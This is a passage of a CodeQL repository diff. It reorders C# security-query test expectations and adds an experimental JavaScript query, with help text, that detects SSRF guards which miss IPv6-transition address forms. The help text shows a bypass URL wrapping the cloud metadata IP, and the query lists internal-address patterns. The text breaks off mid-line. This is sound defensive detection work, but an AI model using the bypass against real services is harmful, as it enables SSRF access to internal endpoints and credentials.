CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | call to method GetAccountID | +| CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:94:21:94:33 | access to property Text | access to property Text | +| CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:95:21:95:29 | access to property Text | access to property Text | +| CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:96:21:96:29 | access to property Text | access to property Text | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected index e7724d5d586b..a6c8142e7d94 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected @@ -1,7 +1,3 @@ -#select -| Test.cs:18:13:18:17 | access to local variable store | Test.cs:15:31:15:59 | object creation of type X509Store : X509Store | Test.cs:18:13:18:17 | access to local variable store | This certificate is added to the root certificate store. | -| Test.cs:28:13:28:17 | access to local variable store | Test.cs:25:31:25:86 | object creation of type X509Store : X509Store | Test.cs:28:13:28:17 | access to local variable store | This certificate is added to the root certificate store. | -| Test.cs:73:13:73:17 | access to local variable store | Test.cs:70:31:70:86 | object creation of type X509Store : X509Store | Test.cs:73:13:73:17 | access to local variable store | This certificate is added to the root certificate store. | edges | Test.cs:15:23:15:27 | access to local variable store : X509Store | Test.cs:18:13:18:17 | access to local variable store | provenance | | | Test.cs:15:31:15:59 | object creation of type X509Store : X509Store | Test.cs:15:23:15:27 | access to local variable store : X509Store | provenance | | @@ -20,3 +16,7 @@ nodes | Test.cs:70:31:70:86 | object creation of type X509Store : X509Store | semmle.label | object creation of type X509Store : X509Store | | Test.cs:73:13:73:17 | access to local variable store | semmle.label | access to local variable store | subpaths +#select +| Test.cs:18:13:18:17 | access to local variable store | Test.cs:15:31:15:59 | object creation of type X509Store : X509Store | Test.cs:18:13:18:17 | access to local variable store | This certificate is added to the root certificate store. | +| Test.cs:28:13:28:17 | access to local variable store | Test.cs:25:31:25:86 | object creation of type X509Store : X509Store | Test.cs:28:13:28:17 | access to local variable store | This certificate is added to the root certificate store. | +| Test.cs:73:13:73:17 | access to local variable store | Test.cs:70:31:70:86 | object creation of type X509Store : X509Store | Test.cs:73:13:73:17 | access to local variable store | This certificate is added to the root certificate store. | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected index 0f5c27f64c1c..83fdf530423a 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected @@ -1,7 +1,3 @@ -#select -| InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | Connection string | -| InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" : String | InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" | Connection string | -| InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" | Connection string | edges | InsecureSQLConnection.cs:49:20:49:32 | access to local variable connectString : String | InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | provenance | | | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" : String | InsecureSQLConnection.cs:49:20:49:32 | access to local variable connectString : String | provenance | | @@ -16,3 +12,7 @@ nodes | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | semmle.label | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | | InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | semmle.label | access to local variable connectString | subpaths +#select +| InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | Connection string | +| InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" : String | InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" | Connection string | +| InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" | Connection string | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected index 2d92a0387b8a..417692ff79ef 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected @@ -1,9 +1,3 @@ -#select -| ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | access to indexer | -| ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | call to method getTelephone | -| ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | call to method getTelephone | -| ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | call to method getTelephone | -| ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | access to property Text | edges nodes | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | semmle.label | access to indexer | @@ -12,3 +6,9 @@ nodes | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | semmle.label | call to method getTelephone | | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | semmle.label | access to property Text | subpaths +#select +| ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | access to indexer | +| ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | call to method getTelephone | +| ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | call to method getTelephone | +| ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | call to method getTelephone | +| ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | access to property Text | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected index 299285d97174..7de4c593e25d 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected @@ -1,8 +1,8 @@ -#select -| HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:55:30:55:64 | object creation of type SqlConnection | object creation of type SqlConnection | -| HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:57:31:57:64 | object creation of type SqlConnection | object creation of type SqlConnection | edges nodes | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | semmle.label | "Password=12345" | | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | semmle.label | "User Id=12345" | subpaths +#select +| HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:55:30:55:64 | object creation of type SqlConnection | object creation of type SqlConnection | +| HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:57:31:57:64 | object creation of type SqlConnection | object creation of type SqlConnection | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected index 36abe5531f04..f6768445fe8e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected @@ -1,12 +1,3 @@ -#select -| HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | The hard-coded value "myPa55word" flows to $@ which is compared against $@. | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | "myPa55word" | HardcodedCredentials.cs:16:13:16:20 | access to local variable password | access to local variable password | -| HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | HardcodedCredentials.cs:32:19:32:28 | "username" | name | HardcodedCredentials.cs:30:31:44:13 | object creation of type MembershipUser | object creation of type MembershipUser | -| HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | The hard-coded value "myNewPa55word" flows to the $@ parameter in $@. | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | newPassword | HardcodedCredentials.cs:46:9:46:54 | call to method ChangePassword | call to method ChangePassword | -| HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] | HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] : Byte[] | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | This hard-coded value flows to the $@ parameter in $@. | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | rawData | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | -| HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | The hard-coded value "myPa55word" flows to the $@ parameter in $@. | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | password | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | -| HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | The hard-coded value "myusername" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:31:75:42 | "myusername" | username | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | -| HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | The hard-coded value "mypassword" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | password | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | -| TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | TestHardcodedCredentials.cs:26:19:26:28 | "username" | name | TestHardcodedCredentials.cs:24:31:38:13 | object creation of type MembershipUser | object creation of type MembershipUser | edges | HardcodedCredentials.cs:48:16:48:26 | access to local variable rawCertData : Byte[] | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | provenance | | | HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] : Byte[] | HardcodedCredentials.cs:48:16:48:26 | access to local variable rawCertData : Byte[] | provenance | | @@ -24,3 +15,12 @@ nodes | TestHardcodedCredentials.cs:21:45:21:56 | "mypassword" | semmle.label | "mypassword" | | TestHardcodedCredentials.cs:26:19:26:28 | "username" | semmle.label | "username" | subpaths +#select +| HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | The hard-coded value "myPa55word" flows to $@ which is compared against $@. | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | "myPa55word" | HardcodedCredentials.cs:16:13:16:20 | access to local variable password | access to local variable password | +| HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | HardcodedCredentials.cs:32:19:32:28 | "username" | name | HardcodedCredentials.cs:30:31:44:13 | object creation of type MembershipUser | object creation of type MembershipUser | +| HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | The hard-coded value "myNewPa55word" flows to the $@ parameter in $@. | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | newPassword | HardcodedCredentials.cs:46:9:46:54 | call to method ChangePassword | call to method ChangePassword | +| HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] | HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] : Byte[] | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | This hard-coded value flows to the $@ parameter in $@. | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | rawData | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | +| HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | The hard-coded value "myPa55word" flows to the $@ parameter in $@. | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | password | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | +| HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | The hard-coded value "myusername" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:31:75:42 | "myusername" | username | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | +| HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | The hard-coded value "mypassword" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | password | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | +| TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | TestHardcodedCredentials.cs:26:19:26:28 | "username" | name | TestHardcodedCredentials.cs:24:31:38:13 | object creation of type MembershipUser | object creation of type MembershipUser | diff --git a/javascript/ql/integration-tests/query-suite/not_included_in_qls.expected b/javascript/ql/integration-tests/query-suite/not_included_in_qls.expected index 46317e8800f2..4eb34a847e2b 100644 --- a/javascript/ql/integration-tests/query-suite/not_included_in_qls.expected +++ b/javascript/ql/integration-tests/query-suite/not_included_in_qls.expected @@ -63,6 +63,7 @@ ql/javascript/ql/src/experimental/Security/CWE-347/decodeJwtWithoutVerificationL ql/javascript/ql/src/experimental/Security/CWE-444/InsecureHttpParser.ql ql/javascript/ql/src/experimental/Security/CWE-522-DecompressionBombs/DecompressionBombs.ql ql/javascript/ql/src/experimental/Security/CWE-918/SSRF.ql +ql/javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.ql ql/javascript/ql/src/experimental/StandardLibrary/MultipleArgumentsToSetConstructor.ql ql/javascript/ql/src/experimental/heuristics/ql/src/Security/CWE-020/UntrustedDataToExternalAPI.ql ql/javascript/ql/src/experimental/heuristics/ql/src/Security/CWE-078/CommandInjection.ql diff --git a/javascript/ql/src/change-notes/2026-06-06-ssrf-ipv6-transition-incomplete-guard.md b/javascript/ql/src/change-notes/2026-06-06-ssrf-ipv6-transition-incomplete-guard.md new file mode 100644 index 000000000000..35bd19acf46c --- /dev/null +++ b/javascript/ql/src/change-notes/2026-06-06-ssrf-ipv6-transition-incomplete-guard.md @@ -0,0 +1,4 @@ +--- +category: newQuery +--- +* Added a new experimental query, `javascript/ssrf-ipv6-transition-incomplete-guard`, to detect SSRF host-validation guards that reject private IPv4 ranges but fail to unwrap IPv6-transition forms (IPv4-mapped `::ffff:`, NAT64 `64:ff9b::`, 6to4 `2002::`), allowing the guard to be bypassed by wrapping an internal IPv4 address in a transition literal. diff --git a/javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.qhelp b/javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.qhelp new file mode 100644 index 000000000000..79230285f516 --- /dev/null +++ b/javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.qhelp @@ -0,0 +1,59 @@ + + + + +

+ Server-side request forgery (SSRF) guards frequently reject requests to internal + addresses by checking the request host against a denylist of private, loopback and + cloud-metadata IPv4 ranges. When such a guard inspects only the dotted-quad IPv4 form + and never unwraps IPv6-transition representations, it can be bypassed: the host + validator classifies the address as public, but the operating system routes the + connection to the embedded internal IPv4 endpoint. +

+

+ The affected forms include IPv4-mapped IPv6 (::ffff:169.254.169.254), + NAT64 (64:ff9b::a9fe:a9fe) and 6to4 (2002::). A URL such as + http://[::ffff:169.254.169.254]/ passes a dotted-quad denylist unchanged + while still reaching the internal address. +

+ + + +

+ Normalize the host before validating it: parse the address with a transition-aware + library and unwrap IPv4-mapped, NAT64 and 6to4 forms to their embedded IPv4 address, + then apply the private-range check to the normalized value. Libraries such as + ipaddr.js classify these forms correctly via their range API, and + SSRF-protection libraries such as request-filtering-agent apply the check + after DNS resolution. Validate the resolved address rather than the textual host. +

+ + + +

+ The following guard rejects private IPv4 ranges using the private-ip + package, which inspects the textual IPv4 form only. An attacker supplies + ::ffff:169.254.169.254, which the guard classifies as public, but the + request still reaches the internal metadata endpoint. +

+ + + +

+ The following guard parses the host with a transition-aware classifier, so the + embedded internal IPv4 address is detected regardless of the transition form used. +

+ + + + + + +
  • OWASP: Server-Side Request Forgery.
    • +
  • Common Weakness Enumeration: CWE-918.
    • +
  • Common Weakness Enumeration: CWE-1389.
    • + +     +     diff --git a/javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.ql b/javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.ql new file mode 100644 index 000000000000..14e0766d796b --- /dev/null +++ b/javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.ql @@ -0,0 +1,129 @@ +/** + * @name SSRF host guard does not reject IPv6-transition forms + * @description An SSRF host guard that rejects private or loopback IPv4 ranges but never + * unwraps IPv6-transition forms (IPv4-mapped `::ffff:`, NAT64 `64:ff9b::`, + * 6to4 `2002::`) can be bypassed by wrapping an internal IPv4 address in a + * transition literal, allowing requests to reach internal endpoints. + * @kind problem + * @problem.severity warning + * @id javascript/ssrf-ipv6-transition-incomplete-guard + * @tags security + * experimental + * external/cwe/cwe-918 + * external/cwe/cwe-1389 + */ + +import javascript + +/** + * Holds if `f` imports a dotted-quad-oriented private-IP guard package whose + * classification is performed on the textual IPv4 form and therefore returns + * `false` for an internal address wrapped in an IPv6-transition literal. + */ +predicate importsHandRolledIpGuard(File f) { + exists(DataFlow::SourceNode mod | + mod.getFile() = f and + mod = DataFlow::moduleImport(["private-ip", "is-ip", "ip", "ip-range-check"]) + ) +} + +/** + * Holds if `f` contains a call to an `isPrivate`-style host classifier, the + * common name for a hand-rolled SSRF guard. + */ +predicate hasIsPrivateCall(File f) { + exists(DataFlow::CallNode c | + c.getFile() = f and + c.getCalleeName().regexpMatch("(?i)^is_?private(ip|address|host)?$") + ) + or + exists(DataFlow::MethodCallNode m | + m.getFile() = f and + m.getMethodName().regexpMatch("(?i)^is_?private(ip|address|host)?$") + ) +} + +/** + * Holds if `f` contains a hand-written RFC 1918, loopback or cloud-metadata IPv4 + * literal used as a denylist entry. + */ +predicate hasRfc1918Literal(File f) { + exists(StringLiteral s | + s.getFile() = f and + s.getValue() + .regexpMatch("(?i).*(127\\.0\\.0\\.1|169\\.254\\.169\\.254|10\\.|192\\.168|172\\.1[6-9]|::1|fc00|fd00|metadata\\.google).*") + ) +} + +/** Holds if `f` carries any hand-rolled, dotted-quad-oriented SSRF guard signal. */ +predicate hasUnsafeGuardSignal(File f) { + importsHandRolledIpGuard(f) or + hasIsPrivateCall(f) or + hasRfc1918Literal(f) +} + +/** Holds if `func` has a name that reads as an SSRF host or URL validator. */ +predicate isSsrfValidatorFunction(Function func) { + func.getName() + .regexpMatch("(?i).*(validate|check|guard|reject|deny|block|allow|is_?safe|sanitiz)e?_?.*(url|host|ip|address|target|endpoint|webhook|origin).*") + or + func.getName() + .regexpMatch("(?i).*(is_?)?(private|internal|loopback|reserved|external)_?(ip|address|host|url).*") + or + func.getName().regexpMatch("(?i).*(ssrf|metadata).*") +} + +/** + * Holds if `f` imports a maturity-hardened, transition-aware address classifier + * or SSRF-protection library that does unwrap IPv6-transition forms. + */ +predicate importsSafeClassifier(File f) { + exists(DataFlow::SourceNode mod | + mod.getFile() = f and + mod = + DataFlow::moduleImport([ + "ipaddr.js", "ssrf-req-filter", "request-filtering-agent", "ssrf-agent", "netmask", + "ip-cidr", "cidr-matcher", "blocked-at" + ]) + ) +} + +/** + * Holds if `f` already performs an explicit IPv6-transition unwrap or + * canonicalization, so the guard does see the embedded IPv4 address. + */ +predicate hasTransitionUnwrap(File f) { + exists(StringLiteral s | + s.getFile() = f and + ( + s.getValue().matches("%64:ff9b%") or + s.getValue().matches("%::ffff%") or + s.getValue().matches("%2002:%") or + s.getValue().matches("%2001:%") + ) + ) + or + exists(Identifier id | + id.getFile() = f and + id.getName() + .regexpMatch("(?i).*(ipv4mapped|v4mapped|mappedipv4|ipv4inipv6|embeddedipv4|unwrap.*ip|toipv4|canonicaliz|isipv4compat).*") + ) + or + exists(DataFlow::MethodCallNode m | m.getFile() = f and m.getMethodName() = ["range", "kind"]) +} + +/** Holds if `f` is treated as safe (transition-aware), suppressing the alert. */ +predicate isSafe(File f) { importsSafeClassifier(f) or hasTransitionUnwrap(f) } + +from Function guard, File f +where + guard.getFile() = f and + isSsrfValidatorFunction(guard) and + hasUnsafeGuardSignal(f) and + not isSafe(f) and + not f.getRelativePath() + .regexpMatch("(?i).*/(tests?|specs?|examples?|__tests__|e2e|node_modules)/.*") +select guard, + "This SSRF host guard rejects private IPv4 ranges but never unwraps IPv6-transition forms " + + "(IPv4-mapped '::ffff:', NAT64 '64:ff9b::', 6to4 '2002::'); an attacker can wrap an internal " + + "IPv4 address in a transition literal to bypass it and reach internal endpoints." diff --git a/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected b/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected index c4f42ba87154..0385389e73c1 100644 --- a/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected +++ b/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected @@ -1,8 +1,3 @@ -#select -| test.js:7:16:7:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:7:16:7:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | -| test.js:10:16:10:25 | payloadURL 